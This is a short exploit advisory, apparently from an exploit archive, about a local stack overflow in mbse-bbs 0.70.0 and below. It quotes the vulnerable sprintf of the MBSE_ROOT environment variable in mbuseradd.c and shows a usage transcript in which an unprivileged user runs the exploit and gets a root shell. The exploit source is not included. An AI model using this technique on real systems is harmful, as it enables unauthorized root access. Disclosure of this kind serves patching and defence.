GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below. The current version of mbse-bbs does not contain these weaknesses. Exploitation of these vulnerabilities can facilitate a privilege escalation attack in which an unprivileged user becomes root. Exploit calculates return address where ASLR is not in use. Vulnerable code is shown below;matthew@localhost ~/foo/mbsebbs-0.70.0/unix $ cat -n mbuseradd.c...177 shell = calloc(PATH_MAX, sizeof(char));...228 sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));(heap corruption in 0.33.17/stack overflow in others). *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***Example Usage.matthew@localhost ~ $ iduid=1000(matthew) gid=100(users) groups=10(wheel),100(users)matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit[ Using return address 0xbfffefd8sh-3.1# iduid=0(root) gid=1(bin) groups=10(wheel),100(users)- prdelka